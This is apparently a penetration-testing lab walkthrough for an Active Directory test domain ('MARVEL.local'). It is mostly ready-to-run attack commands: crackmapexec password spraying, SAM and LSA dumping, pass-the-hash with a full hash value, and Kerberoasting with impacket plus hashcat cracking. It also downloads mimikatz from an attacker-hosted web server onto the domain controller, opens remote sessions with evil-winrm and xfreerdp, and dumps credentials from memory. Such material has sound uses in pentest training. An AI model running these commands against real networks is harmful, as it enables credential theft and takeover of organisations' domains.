We will perform various Lateral movement and vertical movement . Vertical movement allows a penetration tester to escalate their privileges within a network, as compared to lateral movement, which focuses on using the same user privileges across multiple systems on the network.


Lateral movement with crackmapexec:

  1. Power on kali, THEPUNISHER, Windows server 2022 . We will perform a pass the password attack using the password of the user fcastle across the entire domain. Make sure you have installed crackmapexec on your kali. Use the following command:
crackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1

aad_1 crackmapexec performs SMB enumeration on the targeted network using the creds. Then it uses pwn3d syntax to show that the machine has been affected using the username and password 2. Retrieving the SAM database from the windows devices across the domain using the following command:

crackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1 --sam

aad_2 The local usernames and NTLMV1 hashes has been retrieved from the client machine. These hashes can be used in PTH(pass the hash) attack across the network for lateral movement and privesc on other devices. 3. Performing again pass the password attack but using the flag --local-auth using a local admin account credentials, as this is a local account we removed the flag -d which is for domain users/admins:

crackmapexec smb 10.11.12.0/24 -u Administrator -p Password1! --local-auth

aad_3 4. Performing a PTH attack using the hash of the local administrator account, we have retrieved the hash of the local admin from the previous --sam command:

crackmapexec smb 172.30.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth  # Pass the hash

aad_4 5. As we can notice that fcastle account has certain admin privileges, we can try to dump the LSA secrets across the domain devices using the following command:

crackmapexec smb 10.11.12.0/24 -u fcastle -d MARVEL.local -p Password1 --lsa

aad_5


Vertical movement using kerberos

Important

For this attack to work, the time on Kali Linux needs to be in sync with the time on the targeted domain controller. If not, the following message will appear: "Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)" Issue. We will solve this issue during this practical exercise

  1. Open kali and install ntpdate using the following command:
sudo apt install ntpsec-ntpdate
  1. Next, synchronize the time with the targeted domain controller:
sudo ntpdate 10.11.12.128
  1. Retrieve the Kerberos TGS ticket hash from the domain controller by using a valid domain user credential to the domain controller:
impacket-GetUserSPNs MARVEL.local/fcastle:Password1 -dc-ip 10.11.12.128 -request

aad_6

Note

An SPN is a unique identifier for a service instance. SPNs are used in Kerberos authentication to associate a service instance with a service logon account, allowing clients to securely request access to services running on servers.

SAVE THE TGS HASH INTO A FILE 4. Determine the hashcat code for cracking Kerberos 5 etype 23 hashes. Use 13100 for cracking the TGS hash using hashcat , we are going to use :

hashcat -h | grep TGS

aad_7 5. Command for cracking:

hashcat -m 13100 TGS.txt /usr/share/wordlists/rockyou.txt -O

aad_8 6. Results, hash cracked and the password is MYpassword123# aad_9


Lateral movement using mimikatz:

  1. Open kali linux , then head over to this path /usr/share/windows-resources/mimikatz/x64 . Start a python web server on the same network as Domain controller aad_10
  2. Login onto the Domain controller as the SQLService account we attacked during the TGS hash cracking. Use those credentials along with username as MARVEL\SQLService . Then open cmd as administrator and follow the commands for downloading those files:
Invoke-WebRequest -uri http://kali_ip:8000/mimikatz.exe -OutFile mimikatz.exe
# Install the 4 files the same way

aad_11 You can get a remote access using evil-winrm and xfreerdp from kali itself using the following commands:

xfreerdp /v:10.11.12.128 /u:SQLService /p:'MYpassword123#' /d:MARVEL.local
# If you are having the hash use '/pth {hash}' instead of '/p'
# Syntax: evil-winrm -i IP -u Username -H Hash
evil-winrm -i 10.11.12.128 -u SQLService -p 'MYpassword123#'
  1. To run the mimikatz.exe wither you double click from the file downloaded in Downloads folder, or use the same CLI and type .\mimikatz.exe aad_12 aad_13
  2. Check mimikatz privileges using the following command:
privilege::debug

aad_14 The screenshot shows Mimikatz has the necessary privileges to extract the passwords and hashes


Grabbing credentials using mimikatz:

  1. Extract all the user accounts and their password hashes by using the following command:
sekurlsa::logonpasswords

aad_15 Mimikatz is able to retrieve all the user details that were stored within the memory of the host device since the last time it was rebooted. 2. To extract the LSA data from the memory of the domain controller, use the following command:

lsadump::lsa /patch

aad_16 3. By obtaining the NTLMv1 hashes of each user, you can perform lateral movement throughout the network using the PTH technique and even perform password cracking using hashcat.